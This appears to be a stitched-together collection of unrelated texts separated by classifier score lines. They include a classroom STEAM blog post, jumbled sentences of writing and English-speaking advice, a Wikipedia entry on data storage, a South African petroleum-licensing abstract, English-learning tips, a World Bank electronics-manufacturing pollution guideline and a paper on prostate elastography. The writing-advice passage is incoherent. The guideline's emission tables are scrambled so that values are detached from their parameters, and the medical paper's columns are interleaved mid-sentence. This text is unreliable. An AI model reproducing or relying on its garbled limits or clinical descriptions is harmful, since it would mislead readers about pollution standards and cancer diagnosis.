Following the book, we learned about the 6 simple machines – levers, pulleys, wheel and axels, wedges, screws, and inclined planes. We watched three videos: OK GO’s This Too Shall Pass, Bob Partington’s Rube Slowberg, and Audri’s Monster Trap. The videos showcased three different Rube Goldberg Machines. Rube Goldberg machines are complex machines that solve a simple task, such as trapping a monster, much like the old Mousetrap game. While watching the videos, we tried to pick out the different simple machines used. The students were then given their task – create a Rube Goldberg machine! They had access to any material they wanted in the room to create the machine. They were challenged with using at least three different simple machines that comprised three chain reactions. The groups had to complete a Design Process Organizer for each simple machine/chain reaction they used. The activity put all the students learnings in the 4C’s, the Design Thinking Process, and their grit and resiliency to the test. Most groups got frustrated, some machines worked and some didn’t, but no one quit.
We are now heading into the FINAL week of STEAM!
|
__label__pos
| 0.893401
|
If they're all really short, the prose will sound panicked or staccato. I would write one every day if I had the time. In some ways, practicing speaking is even easier by yourself! Sometimes a sentence shares more than one thought. A lot of people are so scared of speaking English, it feels like they are blaming me for them not understanding. Do your students know what a subject and predicate is? In English, sentence structure is an incredibly complicated thing. Sure, you can string a few sentences together to communicate your thoughts.
Make speaking easier by learning the different forms of any words you learn. But, the male as suitor demonstrates his good provider role by being the first on scene with nesting material. The light is very good and also, now, there are shadows of the leaves. Serve them the right mix of nourishing content, and make them crave more. Try to match the tone, speed and even the accent if you can. Mediocre writing bores your readers to tears.
She explained why she was upset with her boss. Absence of commas, on the other hand, indicates the information is essential to the sentence. Telling your employee or collaborator that you trust him is highly meaningful, as it means that you believe in his capabilities to make it happen. Study how they were formed and determine the root sentences to help you improve your own skills. Follow those rules that we all must follow in sentence structure, including using commas appropriately, using complete sentences and following appropriate spelling rules.
He admitted he had lost the winning ticket. It makes it feel more doable and not so overwhelming when you can approach it in this step-by-step way. Have a great rest of the week! Technology has brought to us incredible and increasingly cheaper ways to instantly communicate with others, regardless of where you are. If people don't open themselves they probably won't have enough patience to learn and to cooperate with others. Notice how there are different types of sentence structures in the passage.
When you have the opportunity, look for passages in books you have read that make good use of complex and compound sentences. Next, students can move to identifying the subject and predicates on their own in sentences, then they can write their own sentences. Using a semicolon is a stylistic choice that establishes a close relationship between the two sentences. Thank you very much in advance! My guess is, probably not. A comma splice occurs when two are joined with just a comma.
Practicing Sentences with Gradual Release From here, I like to have students complete subject and predicate puzzles. Isn't this what adds zest to our life? Melissa likes to go jogging in the mornings, and she's training for a marathon. Learn to hear the difference! This is important because, even with simple sentences, there are varying lengths and types of subjects and predicates. Anne Frank wrote in her famous diary, How wonderful it is that nobody need wait a single moment before starting to improve the world. Check, however, to make sure that this solution does not result in short, choppy sentences. Students often struggle with understanding what actually constitutes a complete sentence, when a sentence ends, and how to edit their own sentences in their writing. The Importance of Improving Sentence Structure Imagine seeing all the pieces for a house laid out in front of you.
This guide will teach you an important aspect of the cultural fluency system that we teach every student here at Real Life English. Readers, on the other hand, do not usually recognize the specific mistakes in a document the way an editor or publisher would. My mom and dad said they were disappointed in me. Structure that sentence a bit better and he would have had a much more pleasant result. Creating fresh metaphors and mini-stories are things I still struggle with. If you create a sentence that describes 2 or more objects or actions, the different elements must be described using the same grammatical terms. So to make the sentence active we would write: 'Sally bathed the doll.
See more examples of this on the page. Take a moment to connect subject with the noun part of the sentence- the who or what. While students might write compound sentence in their writing and hopefully they do , adding in questions and compound sentences while first learning subject and predicate can be incredibly overwhelming. We will give you the answers next week in the comments section and on our Facebook page. The thief entered the room quietly, then opened the safe slowly and carefully. The general reason for this, at least in the United States, is that we are more direct and proactive about our communication.
Anyway, loved the post and the practical tips, Henneke. But nourishing content engages, delights, and inspires your readers. You might want to check out the book Made to Stick by Chip and Dan Heath, or The Tall Lady With the Iceberg by Anne Miller. What does this have to do with Hemingway? How can you practice speaking English? The easiest way to fix a run-on is to split the sentence into smaller sentences using a period. Revision: The results of the study were inconclusive ; therefore, more research needs to be done on the topic. I really enjoy your style of writing and look forward to reading your articles.
|
__label__pos
| 0.990324
|
Data storage device From Wikipedia, the free encyclopedia
A
data storage device is a device for recording (storing) information (data). Recording can be done using virtually any form of energy. A storage device may hold information, process information, or both. A device that only holds information is a recording medium. Devices that process information (data storage equipment) may either access a separate portable (removable) recording medium or a permanent component to store and retrieve information. Electronic data storage is storage that requires electrical power to store and retrieve data. Most storage devices that do not require visual optics to read data fall into this category. Electronic data may be stored in either an analog or digital signal format. This type of data is considered to be electronically encoded data, whether or not it is electronically stored. Most electronic data storage media is considered permanent (non-volatile) storage, that is, the data will remain stored when power is removed from the device. In contrast, electronically stored information is considered volatile memory
With the exception of barcodes and OCR data, electronic data storage is easier to revise and may be more cost effective than alternative methods due to smaller physical space requirements and the ease of replacing (rewriting) data on the same medium. However, the durability of methods such as printed data is still superior to that of most electronic storage media. The durability limitations may be overcome with the ease of duplicating (backing-up) electronic data.
Terminology
Devices that are not used exclusively for recording (e.g. hands, mouths, musical instruments) and devices that are intermediate in the storing/retrieving process (e.g. eyes, ears, cameras, scanners, microphones, speakers, monitors, projectors) are not usually considered storage devices. Devices that are exclusively for recording (e.g. printers), exclusively for reading (e.g. barcode readers), or devices that process only one form of information (e.g. phonographs) may or may not be considered storage devices. In computing these are known as input/output devices.
An organic
brain may or may not be considered a data storage device.[1]
All information is data. However, not all data is information.
Data storage equipment
The equipment that accesses (reads and writes) storage information are often called storage devices. Data storage equipment uses either:
portable methods(easily replaced), semi-portablemethods requiring mechanical disassembly tools and/or opening a chassis, or inseparable methodsmeaning loss of memory if disconnected from the unit.
The following are examples of those methods:
Portable methods Hand crafting Flat surface Printmaking Photographic Fabrication Automated assembly Textile Molding (process) Solid freeform fabrication Cylindrical accessing Card reader/drive Tape drive Mono reel or reel-to-reel Cassette player/recorder Disk accessing Disk drive Disk enclosure Cartridge accessing/connecting (tape/disk/circuitry) Peripheral networking Flash memory devices Semi-portable methods Hard drive Circuitry with non-volatile RAM
Inseparable methods Circuitry with volatile RAM Neurons Recording medium
A recording medium is a physical material that holds data expressed in any of the existing recording formats. With electronic media, the data and the recording medium is sometimes referred to as "software" despite the more common use of the word to describe computer software. With (traditional art) static media, art materials such as crayons may be considered both equipment and medium as the wax, charcoal or chalk material from the equipment becomes part of the surface of the medium.
Ancient and timeless examples Optical Any object visible to the eye, used to mark a location such as a, stone, flag or skull. Any crafting material used to form shapes such as clay, wood, metal, glass, wax. Quipu Any branding surface that would scar under intense heat. Any marking substance such as paint, ink or chalk. Any surface that would hold a marking substance such as, papyrus, paper, skin. Chemical DNA Pheromone
Modern examples by energy used Chemical Dipstick Thermodynamic Thermometer Photochemical Photographic film Mechanical Pins and holes Punch card Paper tape Piano roll Music box cylinder or disk Grooves (See also Audio Data) Phonograph cylinder Gramophone record DictaBelt (groove on plastic belt) Capacitance Electronic Disc Pins and holes Magnetic storage Wire recording (stainless steel wire) Magnetic tape Floppy disk Optical storage Photo paper Hologram Projected transparency Laserdisc Magneto-optical disc Compact disc Holographic versatile disc Electrical Semiconductor used in volatile RAM microchips Floating gate transistor used in non-volatile memory cards
Modern examples by shape
A typical way to classify data storage media is to consider its shape and type of movement (or non-movement) relative to the read/write device(s) of the storage apparatus as listed:
Paper card storage Punched card (mechanical) Tape storage (long, thin, flexible, linearly moving bands) Paper tape (mechanical) Magnetic tape (a tape passing one or more read/write/erase heads) Disk storage (flat, round, rotating object) Gramophone record (used for distributing some 1980s home computer programs) (mechanical) Floppy disk, ZIP disk (removable) (magnetic) Holographic Optical disc such as CD-ROM, CD-R, CD-RW, DVD, DVD-R, DVD-RW, DVD+R, DVD+RW, DVD-RAM, Blu-ray, Minidisc Hard disk (magnetic) Magnetic bubble memory Flash memory/memory card (solid state semiconductor memory) xD-Picture Card MMC USB flash drive (also known as a "thumb drive" or "keydrive") SmartMedia CompactFlash I and II Secure Digital SONY Memory stick (Std/Duo/Pro/MagicGate versions) Solid state disk
Bekenstein (2003) foresees that miniaturization might lead to the invention of devices that store bits on a single atom.
See also Computer data storage Recording formats Content format Multimedia Streaming Media Blank media tax Medium format (film) Nonlinear medium (random access) Library References Bekenstein, Jacob D. (2003, August). Information in the holographic universe. Scientific American. Bibliography Bennett, John C. (1997). " 'JISC/NPO Studies on the Preservation of Electronic Materials: A Framework of Data Types and Formats, and Issues Affecting the Long Term Preservation of Digital Material". British Library Research and Innovation Report 50. External links Historical Notes about the Cost of Hard Drive Storage Space
|
__label__pos
| 0.947556
|
Original Research Evaluating transformation progress of historically disadvantaged South Africans: Programme perspective on the downstream petroleum industry Submitted:31 January 2019 | Published:27 June 2019 About the author(s)Msuthukazi Makiva, School of Government, Faculty of Economic and Management Sciences, University of the Western Cape, Cape Town, South Africa
Isioma Ile, School of Government, Faculty of Economic and Management Sciences, University of the Western Cape, Cape Town, South Africa
Omololu M. Fagbadebo, Department of Public Management, Law and Economics, Durban University of Technology, Pietermaritzburg, South Africa
Abstract Background: Since the dawn of democracy in 1994, the South African (SA) government has sought to ensure economic transformation of historically disadvantaged people, using a series of programmes and projects. The petroleum downstream of SA, regulated by the Department of Energy, is among the industries that government uses to maximise transformation. Through a licensing sub-programme, one major condition stipulated prior to awarding licences to operate is the inclusion of historically disadvantaged South Africans in the business plans. Objectives: This article evaluates the extent to which one of the sub-programmes developed to empower historically disadvantaged South Africans (HDSA) in the downstream petroleum industry (petroleum licensing) meets the requirements of the identified relevant evaluation criteria, based on the guidelines of the Development Assistance Committee of the Organisation for Economic Cooperation and Development (DAC/OECD). Method: This sub-programme (partial summative evaluation) is critical as it sought to determine its alignment to the tenets of government policy of addressing past inequity by means of economic ownership. The DAC/OECD evaluation criteria were selected to measure the relevance, effectiveness, efficiency, impact and sustainability of the sub-programme. The justification for using this model is that it is appropriate to public policy response and management tool, especially for developing countries. Some of these measurements were conducted qualitatively, while some were done quantitatively. Results: Emerging data trends analysed indicate that there is a great deal of efficiency in the delivery of licences to operate in the downstream petroleum sector as these were issued in high volumes. The same cannot be said about the HDSAs’ economic empowerment, by means of ‘dealer’ and ‘company’ ownership. Conclusion: Research concludes that the lack of critical resources, such as funding, land, infrastructure and critical skills, were the main reasons why the sub-programme is DAC/OECD non-compliant. Keywords MetricsTotal abstract views: 115
Total article views: 39
|
__label__pos
| 0.701207
|
"What's the best way to learn a language?"Here I will give you several tips for learning English. They are based on my own experience in learning languages. These tips helped me when I learned a foreign language, and I hope that they will help you as you work on improving your English.
This post was edited by mariame at 2011-11-21 10:36 AM
1. Want to learn.First of all, you must want to learn. If you are not interested in learning English, no class will help you, no book will help you, and no hints will make it easier. If you are not interested, you will find reasons to avoid studying, and whenever you do study, it will be very difficult. So you have to be honest with yourself. Ask yourself, "Do I really want to learn English?" If you can't answer "yes" to this question, it is better for you to set English aside until you're ready and willing to learn.
2. Identify your motivation.Next, you need to identify your motivation. Ask yourself, "Why do I want to learn English? Why do I want to improve my English?" Some people want to learn English to get a better job, or to be considered for a promotion. Other people may need to learn English to attend university or school. Still other people may want to learn English so they can enjoy life in America more, by being able to understand movies and TV, and make friends with their American neighbors. Each person is different, so their motivations will be different also. If you have identified your motivation, it will be easier for you to learn English, because it will help to encourage you as you learn English.
3. Set goals.Once you have identified your motivation, you can set some goals for learning English. Having goals will help you to remember what areas you want to work on, and it will help you to see your progress.
Ask yourself, "What are my goals? What areas would I like to improve?" Pronunciation? Listening comprehension? Would you like to increase your vocabulary? Do you want to know what to say when you go to the bank, the doctor, shopping? Think about what your goals are, and review once in a while to see that you are making progress toward your goals.
4. Practice, practice, practice.After you have set your goals, you have a better idea of what you need to practice. Just like the athlete whose goal is the Olympics must train daily, you as a language learner must practice language every day to make progress toward your goal. We say, "Practice makes perfect." This means the more you practice something, the better you become at it, and the fewer mistakes you will make.
Specific ways to practice:
Speak to native English speakers as much as possible.Write, write, write – letters, email, notes, etc.Make phone calls to practice your English
5. Expose yourself to English as much as possible.The more you expose yourself to English, the more you get used to it and the more familiar it becomes to you. You will start to recognize what sounds right and what sounds wrong. You will also start to understand why certain words or phrases are used instead of others, and you will start to use them in your own conversations and writing. English will start to become a habit, and little by little you will find it easier to use English.
Specific ways to increase exposure to English:
Watch TV and movies.Listen to the radio.Read as much as possible.
6. Enlarge your vocabulary.Having a large vocabulary is basic to learning any language, and it is especially true in English. Reading is a very good way to learn new words. So is doing puzzles or playing different kinds of word games.
|
__label__pos
| 0.908773
|
Electronics Manufacturing
sides), and multilayer (three or more circuit layers). Board manufacturing is accomplished by
producing patterns of conductive material on a nonconductive substrate by subtractive or additive processes. (The conductor is usually copper; the base can be pressed epoxy, Teflon, or glass.) In the subtractive process, which is the preferred route, the steps include cleaning and surface preparation of the base, electroless copperplating, pattern printing and masking, electroplating, and etching. Printed wiring assemblies. Printed wiring assemblies consist of components attached to one or both sides of the printed circuit board. The attachment may be by through-hole technology, in which the legs of the components are inserted through holes in the board and are soldered in place from underneath, or by surface mount technology (SMT), in which components are attached to the surface by solder or conductive adhesive. (The solder is generally a tin-lead alloy.) In printed circuit boards of all types, drilled holes may have to be copper-plated to ensure interconnections between the different copper layers. SMT, which eliminates the drilled holes, allows much denser packing of components, especially when components are mounted on both sides. It also offers higher-speed performance and is gaining over through-hole technology.
The electronics industry includes the manufacture of passive components (resistors, capacitors,
inductors); semiconductor components (discretes, integrated circuits); printed circuit boards (single and multilayer boards); and printed wiring assemblies. This chapter addresses the environmental issues associated with the last three manufacturing processes. The manufacture of passive components is not included because it is similar to that of semiconductors. (A difference is that passive component manufacturing uses less of the toxic chemicals employed in doping semiconductor components and more organic solvents, epoxies, plating metals, coatings, and lead.) Semiconductors. Semiconductors are produced by treating semiconductor substances with dopants such as boron or phosphorus atoms to give them electrical properties. Important semiconductor substances are silicon and gallium arsenide. Manufacturing stages include crystal growth; acid etch and epitaxy formation; doping and oxidation; diffusion and ion implantation; metallization; chemical vapor deposition; die separation; die attachment; postsolder cleaning; wire bonding; encapsulation packaging; and final testing, marking, and packaging. Several of these process steps are repeated several times, so the actual length of the production chain may well exceed 100 processing steps. Between the repetitions, a cleaning step that contributes to the amount of effluent produced by the process is often necessary. Production involves carcinogenic and mutagenic substances and should therefore be carried out in closed systems. Printed circuit board (PCB) manufacturing. There are three types of boards: single sided (circuits on one side only), double sided (circuits on both
Waste Characteristics
Air Emissions Potential air emissions from semiconductor manufacturing include toxic, reactive, and hazardous gases; organic solvents; and particulates from the process. The changing of gas cylinders may also result in fugitive emissions of gases. Chemicals
302
Electronics Manufacturing
in use may include hydrogen, silane, arsine, phosphine, diborane, hydrogen chloride, hydrogen
fluoride, dichlorosilane, phosphorous oxychloride, and boron tribromide. Potential air emissions from the manufacture of printed circuit boards include sulfuric, hydrochloric, phosphoric, nitric, acetic, and other acids; chlorine; ammonia; and organic solvent vapors (isopropanol, acetone, trichloroethylene; n-butyl acetate; xylene; petroleum distillates; and ozone-depleting substances). In the manufacture of printed wiring assemblies, air emissions may include organic solvent vapors and fumes from the soldering process, including aldehydes, flux vapors, organic acids, and so on. Throughout the electronics manufacturing sector, chlorofluorocarbons (CFCs) have been a preferred organic solvent for a variety of applications. CFCs are ozone-depleting substances (ODSs). Their production in and import into developing countries will soon be banned. Hydrochlorofluorocarbons (HCFCs) have been developed as a substitute for CFCs, but they too are ODSs and will be phased out. Methyl chloroform, another organic solvent, has also been used by the electronics industry; it too is an ODS and is being eliminated globally on the same schedule as CFCs. Chlorobromomethane and n-propyl bromide are also unacceptable because of their high ozone-depleting potential. Effluents Effluents from the manufacture of semiconductors may have a low pH from hydrofluoric, hydrochloric, and sulfuric acids (the major contributors to low pH) and may contain organic solvents, phosphorous oxychloride (which decomposes in water to form phosphoric and hydrochloric acids), acetate, metals, and fluorides. Effluents from the manufacture of printed circuit boards may contain organic solvents, vinyl polymers; stannic oxide; metals such as copper, nickel, iron, chromium, tin, lead, palladium, and gold; cyanides (because some metals may be complexed with chelating agents); sulfates; fluorides and fluoroborates; ammonia; and acids. Effluents from printed wiring assemblies may contain acids, alkalis, fluxes, metals, organic solvents, and, where electroplating is involved, metals, fluorides, cyanides, and sulfates.
303
304
eliminates a process step and the corresponding equipment, and has been shown to give
adequate product quality according to the application. General Organic solvent losses can be reduced by conservation and recycling, using closed-loop delivery systems, hoods, fans, and stills. Installation of activated carbon systems can achieve up to 90% capture and recycle of organic solvents used in the system. All solvents and hazardous chemicals (including wastes) require appropriate safe storage to prevent spills and accidental discharges. All tanks, pipework, and other containers should be situated over spill containment trays with dimensions large enough to contain the total volume of liquid over them. Containment facilities must resist all chemical attack from the products. In lieu of containment facilities, the floor and walls, to a reasonable height, may be treated (e.g., by an epoxy product, where chemically appropriate) to prevent the possibility of leakage of accidental spills into the ground, and there should be doorsills. (Untreated cement or concrete or grouted tile floors are permeable.) It is unacceptable to have a drain in the floor of any shop where chemicals of any description are used or stored, except where such a drain leads to an adequate water-treatment plant capable of rendering used or stored chemicals in its catchment area. Waste organic solvents should be sent to a solvent recycling operation for reconstitution and reuse. Where recycling facilities are not available, waste solvents may need to be incinerated or destroyed as appropriate for their chemical composition.
Electronics Manufacturing
gies should be considered where available. Solder dross should not be sent to landfills. (Waste
can be sent to suppliers or approved waste recyclers for recovery of the lead and tin content of the dross.) Scrap boards and assemblies having soldered components should have their components and solder connections removed before they are sent to landfills or recycled for other uses.
Treatment Technologies
Wet scrubbers, point-of-use control systems, and volatile organic compound (VOC) control units are used to control toxic and hazardous emissions of the chemicals used in semiconductor manufacturing. It is often appropriate to scrub acid and alkaline waste gases in separate scrubbers because different scrubber liquids can then be used, resulting in higher removal efficiencies. Air emission concentrations of chemicals such as arsine, diborane, phosphine, silane, and other chemicals used in the process should be reduced below worker health levels for plant operations. Because of the many chemicals used in the electronics industry, wastewater segregation simplifies waste treatment and allows recovery and reuse of materials. Organic wastes are collected separately from wastewater systems. (Note that solvent used in the semiconductor industry cannot be readily recycled because much of it is generated from complex mixtures such as photoresist.) Acids and alkalis are sent to onsite wastewater treatment facilities for neutralization, after segregation of heavy-metal-bearing streams for separate treatment. Fluoride-bearing streams in a semiconductor plant are segregated and treated on site or sent off site for treatment or disposal. Treatment steps for effluents from the electronics industry may include precipitation, coagulation, sedimentation, sludge dewatering, ion exchange, filtering, membrane purification and separation, and neutralization, depending on the particular stream. Sanitary wastes are treated separately (primary and secondary treatment followed by disinfection) or discharged to a municipal treatment system.
Emissions Guidelines
Emissions levels for the design and operation of each project must be established through the en-
305
vironmental assessment (EA) process on the basis of country legislation and the Pollution Prevention and Abatement Handbook, as applied to
local conditions. The emissions levels selected must be justified in the EA and acceptable to the World Bank Group. The guidelines given below present emissions levels normally acceptable to the World Bank Group in making decisions regarding provision of World Bank Group assistance. Any deviations from these levels must be described in the World Bank Group project documentation. The emissions levels given here can be consistently achieved by well-designed, well-operated, and well-maintained pollution control systems. The guidelines are expressed as concentrations to facilitate monitoring. Dilution of air emissions or effluents to achieve these guidelines is unacceptable. All of the maximum levels should be achieved for at least 95% of the time that the plant or unit is operating, to be calculated as a proportion of annual operating hours. Air Emissions The air emissions levels presented in Table 1 should be achieved. Liquid Effluents The effluent levels presented in Table 2 should be achieved. Ambient Noise Noise abatement measures should achieve either the levels given below or a maximum increase in background levels of 3 decibels (measured on the Table 1. Air Emissions from Electronics Manufacturing (milligrams per normal cubic meter)
Parameter
VOC Phosphine Arsine Hydrogen fluoride Hydrogen chloride
Maximum value
20 1 1 5 10
306
Parameter
Maximum value
pH
BOD TSS Maximum Monthly average Oil and grease Phosphorus Fluoride Ammonia Cyanide Total Free Total chlorocarbons and hydrochlorocarbons Metals, total Arsenic Chromium, hexavalent Cadmium Copper Lead Mercury Nickel Tin
69
50 50 20 10 5.0 20 10
Key Issues
1.0
0.1
0.5
10 0.1 0.1 0.1 0.5 0.1 0.01 0.5 2.0
Receptor
Residential, institutional, educational Industrial, commercial
55
45
70
70
and fitted with leak detection devices as appropriate. Well-designed emergency preparedness programs are required. Note that fugitive
emissions occurring when gas cylinders are changed do not normally require capture for treatment, but appropriate safety precautions are expected to be in place. No ozone-depleting chemicals should be used in the process unless no proven alternatives are available. Equipment, such as refrigeration equipment, containing ozone-depleting chemicals should not be purchased unless no other option is available Toxic and hazardous sludges and waste materials must be treated and disposed of or sent to approved waste disposal or recycling operations Where liquid chemicals are employed, the plant, including loading and unloading areas, should be designed to minimize evaporation (other than water) and to eliminate all risk of chemicals entering the ground or any watercourse or sewerage system in the event of an accidental leak or spill.
Source
|
__label__pos
| 0.769479
|
of prostate cancer
Dennis L. Cochlin
Introduction b iopsies for a rising PSA level and a negative There are, however, some limited, but nevertheless
This paper presents initial experience with a new initial set of biopsies require more than 10 very important goals that may be achieved. Toshiba elastography imaging system used to biopsies. 1) Adding elastography-guided biopsies to the detect prostate cancer. Since this is a preliminary 2) A proportion of cancers will be missed (false standard biopsy regime may increase positivity evaluation, the elastography imaging procedure negative tests). The number of false negative rates (reduce false negative results). was performed in addition to our standard tests is difficult to determine as there is no 2) If a tumour is visualised, diagnosis can be procedure of ten systematic biopsies, plus extra gold standard, but based on positivity rates supported by targeting the abnormal area with biopsies of suspicious areas where appropriate. on second or third biopsies the rate may be fewer biopsy cores than conventional biopsies. The elastography images did not influence the between 10 and 33 %. 3) The size of the tumour may be more accurately biopsy pattern and the elastography findings were 3) Increasing the number of biopsy cores obtained estimated and it might be possible to distinguish subsequently compared with tumour detection on increases positivity rates but also increases the significant from insignificant tumours. the biopsy cores (all cores are labelled separately) number of “clinically insignificant” tumours and with radical prostatectomy specimens where found. These are small, low grade tumours Technique available. that, evidence suggests, are unlikely to The elastography system features a split screen The number of patients studied is not yet sufficient progress to clinically significant tumours. with one screen showing a conventional greyscale to present hard data, but the following initial 4) The size of a detected tumour can be estimated image, while the other one visualizes movement impressions of the procedure, illustrative case from biopsy data, i.e. the number of cores using colour Doppler. This is so to speak the basic reports and discussion of the possible role of involved and the length of tumour in each core. real-time elastography image. elastography in the detection of prostate cancer The estimate is often inaccurate because the may provide a starting point for further studies. biopsy core may just detect the edge of a large The greyscale image allows positioning within the tumour and a tumour may be multi-focal. prostate gland. The gland is then compressed and Background allowed to relax by applying 3 or 4 simple “flicks” With patients showing a high serum prostate Because of these disadvantages attempts are of the transducer at about 1–2 second intervals. specific antigen (PSA) level and/or an abnormal being made to visualise tumours on the ultrasound This produces the data for the more sophisticated digital rectal examination there is a high probability image so that biopsies can be targeted to the strain imaging. (40–66 %) of clinically significant prostate cancer. tumour. Greyscale ultrasound and colour Doppler studies, however, are disappointing. More recently, The colour Doppler “elastography” image enables The standard method to detect prostate cancer in contrast-enhanced ultrasound and elastography gain adjustments which optimise the elastography these patients is to perform multiple biopsies of imaging are being studied. image. Although the colour Doppler elastography the prostate obtained in a set pattern throughout image is inherently inferior to the strain images, it the gland which also allows for histological If prostate cancer could be imaged with a method is a real-time image which means if any suspicious (Gleason) grading of any cancer detected. that produces a high negative predictive value then areas are detected, the image plane to study these patients with negative imaging would not need can be accurately determined. There are, however, certain problems with this biopsies. So far, no imaging method has achieved procedure: this objective and even from an unbiased point of Once the data is stored the strain image can 1) It is invasive and unpleasant. Multiple biopsies view it seems unlikely that elastography imaging be produced. The process takes approximately – at least 8 or 10 – are necessary. Repeat can close this gap. 10 seconds, and then the image can be viewed. 2 Elastography of the prostate in the detection of prostate cancer
Depending on the number of planes examined, grayscale images and tumours that, as confirmed zone which is much wider in this young man. It
obtaining the data for the images adds 1 to later, were only visible on the grayscale images may be simply because the tissue nearest the 2 minutes to the examination. were detected. transducer moves more on flicking the transducer 6) Initial studies indicate that elastography imaging than the more distal tissues. The more posterior Although the patient feels the movement of the may well have a place in the detection of part of the gland is shown in medium blue with transducer during the “flicks” that compress the prostate cancer but further research as to its irregular, rather random areas of green. Rotating prostate, this is not painful or uncomfortable. precise role is required. the transducer, so that the lateral horns are in the midline of the image, results in a green band along Initial impressions Case reports the horns. This is often not as clearly continuous 1) The system is easy to use. Data acquisition Case 1 Normal study as that in the posterior gland (Figs. 1.2, 1.3). The takes little time. The increased time required A 32-year-old man with haematospermia was base of the gland (Fig. 1.5) shows a similar for the scan is quite acceptable. The split screen referred for transrectal ultrasound imaging of the pattern as the mid-gland (Fig. 1.4). At the apex displays a greyscale image which makes it easy prostate and seminal vesicles. The results showed the green band is discontinuous or often a bsent. to align the elastography scan plane accurately no findings. The patient agreed to an elastography to the plane which needs to be s tudied. The study of his prostate. The normal pattern is shown. Case 2 colour Doppler overlay allows an estimate of In the figures the greyscale image and the A 58 year old man with a serum PSA of 30.5. appropriate gain settings and indicates how elastography image are displayed alongside each Digital rectal examination showed a firm left much movement is being p roduced while fl icking other (a, b). The colour Doppler image used in gland. Greyscale ultrasound (Fig. 2.1) showed a the transducer. O bviously abnormal a reas are real-time to aid acquisition of the elastography hypoechoic nodule in the left peripheral zone. visible in real time on the colour Doppler image. image is shown in fig. (c). Elastography showed a gap in the normal green 2) The technique is not uncomfortable or painful. The colour scale depicts elasticity. Green is band (Fig. 2.2) and on a slightly different plane 3) Post-processing and measurement of the medium elasticity, red is higher elasticity, blue is a dark, stiff area (Fig. 2.3) that matched with the images is easy, though best practices are not less elasticity. The darker the blue, the less the hypoechoic nodule. This corresponded to positive yet clear. The images appear to be reproducible elasticity. Tissues that do not react to pressure are biopsies in this area, Gleason grade 7. In cases over a range of different pressures when flicking black. The colour elastography image is overlaid where greyscale match elastography results the transducer and over a range of gain settings. onto the greyscale image. It is possible to vary biopsies of the abnormal area might be all that This makes the procedure highly reproducible the merged image from 100 % greyscale to 100 % is necessary. Fig. 2.4 shows the corresponding and relatively operator-independent. elastography. Most of the images shown are 50 % velocity gradient image. 4) The method does demonstrate prostate cancer of each. but initial studies indicate that sensitivity is too Fig. 1.1 a and b show the mid-gland in the Case 3 low to use elastography as the sole examination transverse plane. A continuous band of green A 62-year-old man with a serum PSA level of 3.9. technique. (medium elasticity) is seen across the posterior Digital rectal examination showed an enlarged 5) Both tumours which were not visible on the gland. This does not correspond to the peripheral prostate with no palpable nodules. Greyscale
Fig. 1.1 a Fig. 1.1 b Fig. 1.2 a Fig. 1.2 b Fig. 1.3 a Fig. 1.3 b
u ltrasound (Figs. 3.1 a, 3.2 a) showed no obvious Two clinical workflows including that together with the time needed to collect the
focal nodules. Elastography showed loss of elastography data for the images the total time of the exami elasticity in the left peripheral zone laterally in the The “easy” way to study the prostate with nation increases from about 15 to 30 minutes. mid-gland (Fig. 3.1 a) but not in the base (Fig.3.2 b). elastography imaging is to perform a transrectal During the analysis of the images the transducer Biopsies revealed a Gleason 6 tumour in the area scan of the prostate using greyscale ultrasound could be removed from the rectum or could of decreased elastography. Figs. 3.1 c and 3.1 d imaging together with Doppler studies if this is the remain in place (insertion of the transducer is show elasticity measurements of the abnormal standard practice of the department. In addition, often the most painful part of the procedure). area and the corresponding area on the normal elastography images of the prostate are acquired. side. The different graphs are obvious. After the examination the images are reviewed The possible role of elastography imaging and measurements are obtained as appropriate. Sensitivity and specificity of elastography imaging Case 4 The prostate biopsies are obtained at a later date need to be assessed further, both alone and when A 58-year-old man with a serum PSA level of 9.6. and are planned according to the elastography combined with the current standard technique of Digital rectal examination was computable with results. This has the advantage of allowing ample ultrasound-guided systematic biopsies. Therefore a T2A tumour on the right. Greyscale ultrasound time to analyse the images. The examination, it is currently not possible to determine the role of (Fig. 4.1 a) showed a large hypoechoic area on however, becomes a two-stage procedure which elastography. Current experience, however, the right extending into the transitional zone. might be justified with patients with a rising indicates certain possible conclusions. Elastography imaging (Fig. 4.1 b) showed a serum PSA level and negative previous biopsies. matching area of decreased elasticity, shown as With patients undergoing their first transrectal Firstly, it is important to state what elastography an area of darker blue. As the tumour was fairly ultrasound and biopsy examination such a two- will probably not achieve: anterior, the green posterior band is unaffected. stage procedure is more difficult to justify. If It seems unlikely that elastography imaging alone future studies were to show that this two-stage will replace the need for ultrasound-guided Case 5 approach provides a significant advantage, systematic biopsies. It is unlikely that the negative A 65-year-old man with increased serum PSA. either higher positivity rate or the need for less predictive value will prove sufficient to eliminate Digital rectal examination showed a hard gland biopsies, it would be acceptable. the need for biopsies in patients with a normal compatible with a T2A tumour. Greyscale imaging examination. (Figs. 5.1 a, 5.2 a) showed an inhomogeneous An alternative approach is to analyse the elasto gland but no focal nodules. Elastography graphy images immediately while the transducer In cases where a lesion is detected, elastography (Figs. 5.1 b, 5.2 b) showed decreased elasticity remains in the patient and then to perform the will not eliminate the need for biopsy. It is unlikely throughout the gland with loss of most of the biopsies with an appropriately modified pattern that specificity will be sufficiently high to make an peripheral green band and areas of deep blue in during the same procedure. This allows less time absolute diagnosis. Biopsy will still be needed to the deeper parts of the gland. Biopsies showed to analyse the images and multiple measurements confirm the diagnosis and for Gleason grading. extensive tumour with Gleason 9 tumour in all are not possible. It is, however, possible to review 10 cores taken. the images in less than 10 minutes which means
Fig. 1.4 a Fig. 1.4 b Fig. 1.5 a Fig. 1.5 b Fig. 2.1 Fig. 2.2
Nevertheless, elastography might be used in 3) If elastography imaging is added to grayscale References
